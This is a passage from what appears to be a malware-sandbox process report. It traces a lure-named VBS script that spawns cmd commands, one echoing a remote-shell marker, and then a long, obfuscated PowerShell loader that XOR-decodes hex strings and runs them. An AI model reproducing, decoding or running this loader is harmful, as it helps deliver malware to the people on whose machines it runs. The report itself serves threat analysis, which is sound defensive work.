--disable-accelerated-video-decode --service-request-channel-token=3ACD8B583B42742BB1CE2BD60889D058 --renderer-client-id=4 --mojo-platform-channel-handle=2296 --allow-no-sandbox-job /prefetch:1
7⤵
PID:4448

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=D1C6A63DF836B06DC629D7442511F2C6 --mojo-platform-channel-handle=2000 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
7⤵
PID:5080

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=06FD5006322BCF7FB7CFA6D8A4088CB7 --mojo-platform-channel-handle=2572 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
7⤵
PID:3468

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=AC4C27481E81A9A2E84DB60DCCB20FFF --mojo-platform-channel-handle=2672 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
7⤵
PID:4700

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:2192

C:\Windows\System32\CScript.exe
"C:\Windows\System32\CScript.exe" "C:\Users\Admin\AppData\Local\Temp\GrigoropoulosLaw-294029 poundage 2023-06-06 .vbs"
1⤵
- Checks computer location settings
PID:4868

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir
2⤵
PID:2212

C:\Windows\System32\cmd.exe
cmd /c dir&echo ###RSHELL.EXE###
2⤵
PID:4488

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Misjoinam = """ FSu nOc tCiPo nR AI nMcFlS1 1 U{P B DpPaMrpaImM(P[aSdtBr i n gM] `$AW aFv eSl )G; `$SLFiVn g vPiF L=K ' 'B;R W r iPtAeF-LHeoIsbtU W`$FL iHnSg vFiL;P WdrAi tPeB-nH oss t U`$ L iKnTg v iI;N CWCr i tKe - HDo sUt E`$SL iAnHgSv i ;M K V S`$SU narTeSfFu t R=U BNHeBwL-oOVbgj ePcstS b yhtbeA[ ] V(f`$BWIa v eBlR. LseRnSgct hS U/M 2o)U; K S P VFno r (P`$SF oBr e fCf eFl =S0 ; C`$uFEo r emfBfAeTlI -Ulst C`$ WFaCv eOl .CL eInbgDtTh ; S`$FFVo r eAf fAe l +t= 2 ) { I S`$PKPo m mAaAnGd o =R `$SW aIv eBlt. SCuAbCsCtSr i nPg (I`$ F oprUe f f e lB,S U2 ) ; A M N O A `$CU nSrFeHfMuStC[ `$uFSoSrMe fSfAeFlF/D2 ] F=E [BcEoPnFvTeOr tA]F:A:ATGoRBRyRtSee( `$BK oCmUm acnOdToH, G1D6 )A;P `$SLCabsCt eMnAdLeBs 1b6 0 =E A( `$SU n r eIfSu t [ `$RF oOrHeFf f eOlN/T2p]S -BbRxPoAr I1 0U5V)R;V S `$LU nir etfWuMtL[C`$ FIo rCeCfSfUeAlO/M2R]t = Z`$RLTa sUt e nud e sg1 6O0 ;n P R S} S[ S t r i nUgR]G[ASUyFsPtUe m . TRe x tF.IEEnScBo dgi nAgX] : :FARSPCAIGI . GUeZtBS tTrDi nogM( `$ U n rSeRfAu tM) ; } `$HM a tIeJm a 0T=sITnAcFlT1E1 'S3SA 1M0C1SA 1 D 0 CA0S4 4 7I0 DW0 5 0H5R'I; `$LMFa tPeGmCaH1 = I nDc lP1 1 S'H2 4J0E0M0 AP1eBA0I6 1RAu0H6S0 FU1FD 4A7 3 EF0S0 0E7S5KA 5 B 4W7L3 Cd0 7 1HA 0N8d0AF 0MCS2 7A0U8R1 D 0 0 1UFP0TCL2U4B0SCD1ADM0U1K0K6 0DDS1PAS'u;v`$SMSa tCe mPa 2w= I nAcPlS1A1S ' 2DET0NCP1CDB3N9 1 B 0 6H0AAT2 8 0JD 0CD 1TBA0 CS1 AS1 AS'B;L`$MMbaTt eamMa 3H=mIAnMcSlL1 1B 'E3BAA1 0 1lA 1SDG0lCL0 4R4 7D3 BB1IC 0 7 1 DA0I0D0V4 0BC 4G7F2 0 0R7 1 DA0 CT1UBB0T6I1P9 3KAO0UC 1 BR1OFW0I0D0sAS0 CS1 A 4V7P2 1O0R8K0G7V0 Da0S5c0TC 3 BP0UCF0NFB'e; `$iM a tEePm aS4P= I nFcDl 1B1J 'u1MAI1 D 1pBD0 0B0 7 0DET'R;F`$UMUaStEeDmRaR5K=SICnmcFl 1W1U ' 2AE 0SCI1NDS2 4R0 6 0OD 1SCB0 5L0 Cb2 1H0e8H0B7D0JD 0 5C0 C ' ;C`$PM aCtNeNm a 6 = IDnmcDlS1U1 ' 3OB 3FD 3 A 1 9A0 CD0sAV0S0A0C8U0N5 2s7U0C8V0V4 0CCS4T5 4F9D2 1I0 0C0uD 0ECD2SBY1 0P3MA 0 0U0 EC4C5 4S9M3i9 1 C 0FB 0g5i0T0 0 A ' ; `$ MGast eTmVa 7 =sI nNcAl 1H1C E'K3SB 1 CK0 7U1 D 0f0J0U4 0BC 4H5T4V9 2A4C0F8 0 7N0 8S0PE 0 CA0SDB'U;P`$FM aTtTeTm aM8N=HI n c l 1 1 ' 3IB 0 CE0VF 0 5L0SCT0 A 1BD 0 CA0BDD2SDM0 CN0D5 0 C 0 EW0F8S1 DE0SCI'S;a`$ M aFtAetm aC9 =KI n c lT1 1H S'K2D0 0S7d2C4 0BC 0T4I0 6O1CBL1M0N2 4P0T6 0FDI1BC 0 5 0OC 'S; `$Ve h rSl 0 =RIFnUc lA1S1 ' 2N4 1 0O2PDA0 C 0B5V0UCT0sEK0T8 1kD 0BC 3 D 1 0L1 9O0 CN' ; `$ eGhOrFlD1U= IsnMcSlS1B1U ' 2aAE0S5B0 8A1IA 1UA 4E5P4 9 3 9S1 CP0 BU0F5 0F0A0CAR4 5 4C9 3BAd0ECM0g8T0 5O0CCO0ADI4U5 4f9 2M8 0K7H1EAU0 0 2JA 0 5A0S8P1 AI1OA 4D5 4 9a2 8 1VCR1 DR0 6T2 A 0S5S0 8B1 AB1 AT' ;C`$ eFh rGlW2K=FI n c lF1T1C F'D2B0 0S7S1KFT0S6G0L2 0 C 'A; `$seAhrr lT3M= IAn cVlW1R1N 'H3 9 1BC 0SB 0A5 0L0B0SAo4C5M4M9 2G1I0P0T0ID 0WCf2 B 1 0S3MAS0S0V0 EC4 5 4 9 2 7F0 CL1KEH3JAm0 5A0I6 1SD 4 5N4 9 3OFP0D0 1 B 1SD 1SC 0 8C0P5d'L;t`$ eShTrBl 4 =DI n c l 1S1 'A3PFZ0K0B1HB 1AD 1UCS0 8 0 5M2E8 0F5 0A5 0B6 0aAB' ; `$PeBhIrBlD5 = I nPc l 1 1 U'F0D7 1GD 0BDt0 5A0 5T'P; `$ e h rFlS6 = I n cRlP1T1 S'G2 7j1cD 3h9S1 BS0 6 1 DI0 Cn0 AE1BD 3VFU0 0B1AB 1SDC1 C 0S8S0 5 2G4R0 CA0D4N0S6G1 BB1 0 ' ;D`$UeUhSr l 7 =FIFn cMl 1B1I ' 2U0 2 CT3L1u'R;F`$SeGh r l 8a=AISn cLl 1S1 ' 3 5S' ; `$ SDo rDoS= I nHcFlU1T1 B' 3rC 3RA 2SCR3CBW5SAA5 BI'Z; `$BI mUmmaSnP=BIEn cAl 1D1A V' 2bA 0 8 0T5T0 5T3 EK0L0F0C7O0 DL0 6 1 E 3 9E1CB 0r6G0UAS2 8S'T; f uLn cPtWi o n OfDkVpF M{uPRaFr a m (S`$ R o mBaUn ,S K`$CMRa k aUrSoCnAiBeD)P S F L C;A`$ETIrUoSt h e dF0R = I n c lN1h1 ' 4GD 2CFV0RCS1AB 0r4Y4G9R5 4S4F9 4V1 3K2G2 8V1B9 1 9P2IDT0A6C0 4G0 8 0D0 0 7H3T4U5 3 5 3S2 A 1 C 1 BF1 BI0aC 0F7 1MD 2vD 0T6H0B4 0L8 0 0A0s7 4N7 2BE 0 C 1fDF2T8S1IAS1MAP0lCT0 4N0CB 0 5H0 0D0dC 1RAr4P1S4 0 4 9 1 5M4F9 3PE 0B1U0UC 1 BH0 CB4 4H2A6s0 Bo0 3K0RC 0LA 1rDP4L9 1 2R4 9 4 DN3 6U4L7B2LEI0O5M0Y6L0BBC0H8 0S5T2U8B1PAK1RAB0sCv0E4A0PB 0R5D1 0M2sA 0S8 0DA 0R1 0FC 4D9 4B4 2P8R0 7E0SDS4A9 4AD 3M6 4M7 2B5a0T6 0 AD0T8N1 DU0C0P0A6M0t7U4 7 3 Af1B9U0 5T0 0M1RDT4 1d4KDr0BC 0A1H1MBs0 5s5V1P4 0 3 2N4D4r5 8A3C4S4 7T2TCs1S8e1RCH0 8 0 5B1 A 4 1L4 DF2B4P0 8P1 D 0 CT0 4 0 8 5K9B4F0T4 9I1 4v4C0H4U7 2 EP0 Cm1 D 3PDP1R0R1B9 0 C 4O1M4JD 2 4E0L8C1BD 0 C 0R4 0o8F5 8 4N0 ' ;V.I(K`$oePh rSl 7 )U S`$ATlrNoPtIhNeBdl0S;S`$ T rLoLt hWeBdu5 P=C kIPnZc l 1L1V ' 4 DO2F4 0M0K0M5 0 0O4L9 5 4 4 9G4GDH2TFM0 CD1 BE0P4 4P7 2 ED0 CA1UD 2L4 0ACG1ED 0 1O0 6 0BDD4 1M4HDN2D4S0S8 1AD 0aCM0S4D0 8P5JB 4V5S4K9t3T2 3FDM1S0 1 9K0PC 3K2 3 4 3G4 4 9N2S9D4M1 4AD 2A4S0 8A1 DS0CC 0 4 0 8 5 Ak4H5r4R9 4DDN2F4A0S8 1ADB0AC 0I4 0B8t5 D 4 0H4K0 ' ;D. ( `$KeGhPr l 7 ) `$STPrno tSh eSd 5I;H`$ TVrMoGtDh e dL1B =K FIBnKcClB1i1 U'B1ABL0TCL1ADR1 C 1SB 0T7P4 9 4BDH2 4S0 0 0E5u0l0 4I7 2S0 0S7E1DFS0C6 0I2C0BC 4F1 4RDP0 7M1SCB0M5D0F5S4 5S4T9 2 9 4S1G3P2 3kAV1M0A1SAC1GDU0cC 0V4 4s7L3 BE1 CP0d7S1KDM0 0P0 4D0WC 4d7M2 0F0 7 1OD 0 CP1 BS0W6T1 9P3WAR0LCA1 BB1GFC0L0D0IA 0 CD1pAO4 7F2A1 0S8 0I7o0 D 0M5 0 C 3BBF0 Cr0AF 3A4m4t1F2F7 0 C 1 E 4O4 2I6 0 BA0G3 0NC 0OAs1 DB4F9T3 AM1 0R1LAP1MDF0LCe0B4B4 7 3ABC1 CS0U7 1SD 0 0T0s4 0 CK4L7b2K0P0G7L1ADU0RCS1TB 0B6K1E9D3MA 0 CH1AB 1FFN0 0J0 A 0GCA1 AB4 7 2 1A0S8D0E7s0 DC0E5E0 CH3 BE0OCK0PF 4 1 4T1B2A7N0FC 1 EH4f4H2P6H0 BD0S3s0BCA0 A 1 DC4U9 2r0a0 7a1TDF3 9F1 D 1 BR4 0R4 5O4R9 4M1r4SDA2IF 0 C 1 B 0 4e4S7 2UET0LC 1PDB2M4S0hC 1 D 0D1R0W6 0iDP4 1p4PDS2 4 0F8R1eD 0HC 0S4 0 8 5 Cg4 0R4 0M4 7E2 0T0 7R1 FD0b6 0T2S0DC 4 1F4PDA0s7 1PCP0U5 0K5 4T5 4 9 2C9G4G1 4FDI3VB 0 6S0U4 0U8U0A7T4 0 4S0 4 0 4 0 4b5G4P9V4 DT2T4l0 8 0 2T0 8 1HBK0 6P0E7 0 0 0FCH4L0 4 0L' ;g.J(U`$ eTh rDlM7 )C p`$GT rMoDtth eAdT1t;L} f uUnHc tAi o nL G D T L{ P aHrSaKm (O[RP aDrcaSm eKtFeDr ( P o s iAt iSoCnH T=l i0B,S MVa n dBa tHo r y T= U`$NT rIume )k]P S[KT yfpGeS[ ] ]F `$ ISlTd e rPe mM,T[FPPaPrsaFmBeJtDe r (SPUoLsRi tSi o nN B= 1 ) ] A[ T yPpCeR] L`$ GAl aCsSs lBi b e =S A[SVSo iFdH]M)L;t`$TTPrCoStLhUe dP2 = DI nVcSl 1 1t f' 4 DH2BAN0 6o0 C 0 5S0 8L1 AD1 DB1EBP4K9P5N4E4 9 3B2S2S8 1P9 1R9A2 DF0T6 0T4H0R8S0 0 0 7 3F4 5 3 5d3 2 AM1BCS1bB 1 BT0 CF0F7 1MD 2HDO0i6V0K4 0S8M0A0P0 7F4 7 2MDB0AC 0SFU0C0I0R7 0DC 2PDI1S0 0 7N0 8m0T4 0D0B0KAP2U8 1dAT1TA 0 CS0A4E0GBC0N5A1H0 4W1 4 1 2B7F0 CF1dEU4 4T2M6F0 Bt0E3 0JCE0 AB1 D 4t9M3 AB1G0U1 A 1 D 0 C 0 4F4R7H3EB 0 CD0FFJ0F5 0SCS0SAF1PD 0U0 0A6O0 7P4 7 2p8K1SAC1BAD0 CS0G4 0 BD0F5S1F0 2P7 0 8r0 4N0FC 4l1 4 D 2V4 0I8C1 D 0BC 0 4S0 8 5N1S4A0M4P0H4 5 4m9N3B2C3TAV1 0G1 AA1GDS0 C 0G4v4G7K3 BA0ACO0EF 0 5 0 CS0FAC1ID 0 0k0U6U0 7 4 7B2 C 0M4 0D0O1 D 4C7D2E8 1 AE1 A 0gC 0 4O0 Bl0K5I1 0R2SBM1FCT0d0W0 5T0QD 0 CS1 B 2P8 0CAM0 AB0 CE1IAR1tA 3N4M5 3O5b3 3MBY1 C 0u7f4U0 4 7 2SD 0ACT0DFF0U0N0 7G0PCS2SDE1E0S0D7 0d8 0 4 0 0P0TAA2S4L0T6T0BD 1RCS0S5S0KCE4F1Q4BD 2C4P0S8D1RDs0ACR0 4k0L8U5I0 4L5S4F9 4SDS0 FH0S8O0S5G1 A 0 CB4 0U4E7D2CDK0 C 0 FU0P0T0d7 0 C 3CDL1W0 1H9 0 C 4G1S4TD 0 CA0F1B1VB 0 5 5T9U4C5P4A9W4 D 0WCK0D1L1 BT0 5B5D8 4B5D4N9F3 2T3CA 1b0 1 A 1SD 0SCQ0 4M4K7A2 4A1 CM0m5 1DD 0M0L0FAD0A8 1 A 1 D 2 DO0 CA0K5P0mC 0UEU0 8 1FDT0 CM3U4O4 0A'F;S.S( `$ReCh rJl 7P) P`$WTHr oWtKhSe d 2S; `$ TorDoUt hLeBdC3C = I nSc lL1 1 R'S4 DP2BA 0S6I0LCL0P5 0F8 1BA 1TD 1 BD4R7L2 D 0CC 0TFV0 0T0 7 0WCA2 AS0M6 0f7O1 AF1OD 1UB 1nC 0FAE1LDB0D6U1HBF4C1e4 D 2 4V0 8p1CD 0PCB0L4 0b8F5SF 4T5 4S9 3T2 3PA 1J0 1SAU1WD 0 CS0S4K4V7 3HB 0aCC0 F 0 5S0 CF0PAE1 D 0C0 0 6 0 7Z4 7 2 A 0 8T0 5A0D5 0 0 0S7G0BET2 AO0P6F0 7M1 F 0CC 0 7T1 DQ0 0R0M6N0M7 1PAf3 4T5C3 5 3K3 A 1 Dm0e8 0 7B0RD 0U8j1 BR0LDP4B5H4B9 4VD 2 0R0 5S0BDM0NCC1 B 0 C 0U4 4S0O4 7D3KAd0BC 1oD 2K0 0D4R1l9 0 5O0ECS0U4 0 CI0 7 1 DD0 8F1AD 0A0D0F6A0O7 2OFT0H5R0 8 0UEF1FA 4 1 4MD 2M4T0S8H1 D 0SC 0 4 0D8 5ME 4s0 ' ; .b(S`$ eNhBr lR7H)P T`$ T r o tChpeBd 3N; `$ T r oTtUhSeAdP4R G= MISn c l 1S1B D'K4EDr2EAb0 6 0 C 0 5i0 8E1RA 1 D 1SBR4 7P2CDB0 C 0PF 0N0A0 7 0TCD2F4 0FC 1 DG0 1 0V6C0VDC4S1B4 D 0 C 0P1H1 Bk0z5 5TB 4B5 4 9 4 D 0 CR0 1R1IBH0J5S5SA 4L5T4T9K4PD 2 EO0 5 0O8R1 AI1 A 0 5 0 0N0AB 0 CP4P5 4U9 4hD 2 0 0 5P0SDA0 CB1aB 0FC 0 4 4P0 4f7o3BAG0 CB1SDA2 0A0 4S1L9 0M5T0ECu0 4S0 C 0 7M1 DM0 8d1dD 0F0T0A6 0 7 2HFS0p5 0G8O0UEB1 AJ4 1A4 DR2 4s0H8F1MD 0NCR0D4 0W8 5DEK4 0 ' ;V. (T`$ReHhRr lL7E) `$ST rHoBt hAe d 4M;P`$CTDrDoFt h e d 5 F= I nDcBlS1 1f K'F1 B 0OC 1AD 1 CE1 B 0J7 4 9U4ND 2 AK0 6 0 Cs0 5 0P8 1sA 1 DP1SB 4H7B2TAS1 BB0 C 0U8M1EDT0 CM3 DV1C0S1T9L0 C 4 1I4 0B' ;C. ( `$Ae hDrLlM7 )D `$ TTrRo t hRePdB5F ;T} `$AI nSd uC N=L FI nScUlM1G1g A'K0 2 0CCC1BBS0G7 0IC 0i5B5LA 5MBM'T;F`$ I nUc lT0S3 M=R I n cfl 1C1P F'B2SEM0HCN1CDS2 AS0T6B0J7B1 AB0 6A0T5D0SC 3 E 0 0 0 7E0 DV0 6C1GE 'H;O`$ I nBcUl 0D0 =yI n cKlB1C1W 'G3SAH0 1 0L6R1 ET3EEH0a0 0O7c0TDF0K6C1DEK'V;S`$DI n cil 0S1S =A IOn cClV1a1E P'G4 D 2NBO0 0F1PAM1FD 0S8 1PDK0RC 0 0 5TB 5 DU5M8P4B9H5L4 4P9k3g2 3SA 1A0B1AAP1 DD0bCE0P4 4O7 3 B 1 CL0H7S1 DN0 0U0R4 0SCT4 7S2 0E0 7O1 D 0 CN1 B 0T6r1 9v3 A 0NCA1MBA1LFA0R0 0BAP0BCS1OAS4L7V2P4 0 8 1DBE1CA 0 1s0S8 0 5 3S4 5N3A5D3S2BEA0 CB1FD 2BDB0 C 0 5 0 CD0FEH0A8M1VDR0VC 2AFA0 6F1FBA2HFF1SCU0L7F0iA 1AD 0F0S0 6 0A7B3 9 0 6 0 0R0C7 1SD 0SCB1 BE4P1 4 1A0 F 0 2G1S9i4F9D4 DF3 AS0L6F1 BF0E6A4R9 4VD 2B0S0I7R0bAD0I5O5 9 5 9 4C0D4 5N4 9 4g1 2HEF2 D 3 DD4 9S2S9C4O1G3U2C2H0T0 7 1CD 3B9 1 D 1 BR3S4 4G5l4S9 3V2 3LCU2S0 0 7 1TD 5GAs5 BP3R4e4U0B4U9l4 1 3 2F2M0 0H7S1HD 3V9 1CDr1 B 3S4B4T0 4 0 4p0R'G; .B( `$ eBh rBlS7 )P P`$ IEnDcSlD0O1S;D`$ I n c lF0L2L T= eI nEcCl 1A1 S'E4LD 2 8 1B9 0 8U1BDR0f8S4 9 5 4 4 9c3F2 3HA 1B0A1KAe1 D 0 CF0k4r4S7C3fBg1HC 0 7 1RDR0 0 0 4N0XCO4S7 2S0T0 7P1 DJ0BCB1 B 0A6 1P9P3VAI0 CH1CBV1dF 0I0 0 AD0WCB1 AU4 7 2 4Y0 8 1CBC1 AA0e1 0K8 0 5M3H4 5 3 5 3A2 EI0FC 1ZDA2 D 0OCS0G5 0 C 0SE 0S8 1NDK0 CV2 F 0S6 1GBS2SF 1SC 0a7 0 AA1HDL0 0H0F6 0P7U3C9 0B6M0S0W0W7D1EDD0NCV1BBO4P1M4N1 0 Fk0G2C1 9A4F9 4 DS2 0 0 7 0 DB1 CB4 9 4AD 2M0S0B7T0EAF0C5 5 9R5AAA4F0U4S5H4 9J4S1A2 EU2CD 3hD 4T9 2C9P4B1 3 2R2 0D0 7o1BDm3A9C1FD 1 BP3K4 4k0 4 9B4N1 3t2L2B0T0F7O1DD 3B9 1 DH1 BR3 4G4S0 4S0 4 0B'C; .V( `$Be hKr l 7M)p F`$RI n cRlC0U2U;U`$ TRrKodtAhSe dA7 =B AITnIcMlM1T1 R'N4GDS3 DF0 0 1S9 0 6C4L9 5B4 4 9 4 DT2A8 1U9C0A8 1PD 0D8E4p7p2O0i0 7S1 FB0 6H0 2 0 CT4 1 5 9S4 0 'A; . (S`$Oe h r lM7S)G `$FTOrDoDtPhGeJdS7P;U`$ST r oUtAhBead 7s S=S I nUcBlV1L1T 'F4 DB2aB 0G0A1kA 1BD 0D8M1 DF0 C 0S0R5DB 5SDM5F8L4O7O2F0 0A7e1lFG0B6 0L2 0KC 4p1S4FDL3CDU0E0 1H9 0p6S4U5U4 9 5M9C4M0 'S; .B(C`$Me h rUl 7V)P `$UT rHoPt hBeFd 7 ; `$ TSrToRt hIeFd 6 =P KIAn cBlH1K1C U'T4FD 0 0B0S7H0oDB0AFB0 3S0 CT1 D 4C9S5M4 4 9T3P2 3UAK1 0T1SA 1 D 0 CE0S4 4 7V3EB 1DCR0N7K1TDV0S0 0 4S0TC 4u7 2H0D0 7 1 D 0 CF1GBD0G6 1B9 3nAD0SCS1LB 1 FS0O0 0TAM0BCi1 AP4 7S2K4 0D8 1 B 1 Ae0T1 0P8S0M5v3I4B5E3t5 3P2oE 0 CC1 DN2 DL0 Cu0 5M0HCS0 ET0a8B1 D 0vCO2 FB0C6 1MBU2uFA1 C 0K7 0SAI1KDN0C0 0 6u0 7 3 9m0c6U0 0B0B7S1KD 0 CD1KBN4T1 4 1 0LF 0T2 1 9 4 9c4uD 2 0 0 7 0 Dt1uC 4S9 4AD 0MCG0 1 1iB 0 5M5pDg4A0E4s5B4T9B4 1F2 E 2 D 3CDR4 9O2O9S4 1S3C2 2S0 0P7 1HDL3S9 1BD 1 BS3E4 4P5 4S9J3R2K3SC 2 0 0 7m1PDR5TA 5 B 3S4B4 5A4K9B3 2 3FCP2 0p0U7R1 DH5MAG5 BE3D4c4E5 4c9R3 2 3 C 2f0T0D7 1MD 5PAG5PBd3K4 4C0T4 9 4B1D3H2G2G0B0S7K1 D 3F9N1 DU1 Bb3 4S4 0D4 0B4H0 ' ; . (A`$ eBh rTlF7A) `$STBr oIt hPe dT6P; `$GP s yPcA S=M fPk pO C`$DeEhsrNlI5P B`$PeihSrPl 6 ; `$BTNrEoKtNhGendP7C =F UIRnFc lG1D1 's4 D 3I9 0G8 1VF 0SC 0 2C0 0B1TBD0 2 0SC 0 7j5KAC4D9 5H4 4S9H4SD 0G0V0p7S0SDU0 FD0A3A0 Ck1GD 4 7A2S0 0A7C1nFF0A6 0R2G0FC 4 1F3H2K2m0T0G7 1DDS3 9 1 D 1CBM3S4R5B3 5R3 3 3U0 CS1BBG0M6S4 5K4r9 5FF 5SC 5GFR4M5 4B9R5S9S1 1c5 AL5m9 5 9 5N9B4 5B4g9F5T9 1L1b5BDA5B9C4F0 ' ; .G(V`$IeKh rSl 7 )S F`$ TSrSoRt h e d 7P;H`$PTEr o tAhAe d 8 = IGnOcBl 1 1 O' 4UD 3 EU0 1Z0 CE1SBA0 Cv0PFU4 9T5 4v4 9V4RD 0T0I0G7 0FDA0 FC0M3 0 CV1ADK4S7F2 0s0R7 1 F 0S6 0g2P0aC 4M1D3 2P2 0S0S7K1MDW3D9 1PDE1 BC3S4T5 3T5 3 3 3t0 CH1SB 0S6H4N5T4 9B5 BC5 8 5 8 5T1R5 1f5 FA5D9 5r1 4 5 4 9N5U9S1S1B5 A 5S9 5m9 5U9K4Y5K4F9b5 9c1 1O5 D 4E0 ' ;B.K(h`$ e hRrTl 7 ) K`$BTerSo t hAeSd 8 ; `$ Idn cVlS0 1F N=E DI nUc l 1 1D K' 0C1 1ADP1EDB1 9 1 Ao5 3 4 6K4I6C1E8 1FC 0P0C0 AA0 2 0SA 0K1F0 CI0BAS0P2E1 1A4K7U0MEO0 0 1 DK0 1 1UC 0HBB4 7F0 0P0 6U4N6E1S8 1HCP0 0R0 A 0S2A0 4 0ACk4U6B3 CR0 DN0 ES0 8v0S7B4S7 1VCB5DA 5TBF' ;m`$ IKn cUlP0P0S T= I nKc lS1G1 S'F4 D 3sA 1O9s0E1o0fC 1 BH0P6P0L4 4t9 5K4G4L9e4L1T2C7N0 CR1 Eh4S4 2 6r0 BD0K3 0CC 0 AG1RDK4M9O2B7D0 C 1OD 4P7L3 E 0 CB0 BL2 AA0P5U0 0 0BCU0P7 1BDU4R0U4A7S2FDA0 6O1IEU0 7X0W5 0S6Z0 8F0PDS3 AS1 D 1IBP0b0E0 7 0UEK4B1P4PD 2 0 0K7 0RAD0P5 5M9A5 8S4 0r' ; `$TTMr o t hDeVd 8H E= I ndc lM1Y1U M'F4BDB3U9 0B8A1KFP0AC 0A2a0B0S1EB 0B2S0LC 0 7T5 BH5p4S4 DD0DC 0 7S1AFL5 3U0T8O1P9 1S9 0KDM0O8 1lD 0V8 ' ;A. (C`$GePhKr lO7E)V A`$FTTr oVtShSe d 8z; `$FPPaHvIeNk i rSk e n 2D=U`$WP aFvAeJkRiMr k eBnM2 +I'K\TSepAass . u r f 'A;L`$ S pLhUe rPoVmG=s'S'I;Pinf S( -Pn oKt ( T e stt -SPAaHtEh `$ P a vce k i r kPe nT2 ) ) {uwShPiIlPe T( `$ SPpKhAe r oPmG F-VeAq R' 'n)n k{A.H( `$eeShCrPl 7I)G V`$AI n c lE0T0 ; SdtCaNr tR-SS lCeMeEpN 5C;n} SKeTt -sC oEn t egn t A`$LPPaCvOe kSiTrTkkepns2H `$DSNpChDeMrVo m ;N} `$ SRp h eUrCo mS = GTe te-SCMoOnFtCeFnst E`$LPRa v egkfiFr kPeon 2 ;S`$ T rOoFtPh eSdF9S =S IAnUc lB1A1B O'L4 D 3 DD1TB 0 6C1CD 0P1M0CCB0PDT4H9H5S4A4F9s3g2B3PA 1H0 1 A 1ADU0 CC0 4V4H7 2UAF0T6 0G7 1IFH0PC 1RBN1PDS3 4C5N3 5A3 2AFN1EB 0A6U0Z4E2HB 0 8C1rAR0 CA5AFP5cDC3 A 1 DS1 BR0B0F0D7A0REB4 1 4UD 3DA 1 9 0 1 0 CW1VB 0E6 0P4R4I0 'P; . ( `$ eFh r lE7 ) `$ TtrPo tEh e dF9V;S`$FS pDh e rEo mD0 B=O IMn cElH1K1S 'M3G2 3TAT1B0G1 A 1KDP0PC 0S4R4S7S3 BU1 CP0O7P1 D 0 0T0 4B0TCB4A7S2 0U0 7V1 D 0FCu1WBB0s6D1 9O3 AA0 C 1MB 1 Fe0 0R0KAO0RCP1 AY4 7 2 4 0S8 1PBN1BAA0M1V0V8K0 5 3 4I5 3 5 3K2MAU0 6R1U9A1S0 4N1B4 D 3MDS1BB 0m6 1 D 0 1 0RC 0LDe4E5 4T9L5B9P4C5I4M9 4S9 4VDP3K9L0 8E1HF 0 C 0R2M0 0m1LBB0r2 0SCP0 7 5SA 4U5 4 9 5JFH5 C 5AF 4U0 ' ;M.S( `$ eDhBrSl 7 )e `$PSTpAh e rPoTmB0V; `$SM aGg nY= `$UTJrFo tSh eLd .Dc olu nAts- 6U5 6D;S`$ZS p hde r o mc1 K=t IKn c lA1 1P H' 3M2 3 A 1 0 1 AM1 D 0SC 0L4 4 7 3JB 1SCB0R7F1ADC0I0 0 4P0 CE4f7 2F0E0 7A1 DE0 CM1PBM0C6 1H9B3TA 0OCH1 B 1 F 0U0S0MAO0pC 1LAf4S7B2O4 0S8 1rBF1MAS0 1B0 8 0 5 3F4 5A3 5C3r2 AS0t6D1S9 1a0p4 1A4ADA3FD 1 BP0P6 1BDG0 1B0uC 0oDI4S5 4 9C5PFH5KC 5 FR4S5 4S9 4SDD3 EK0 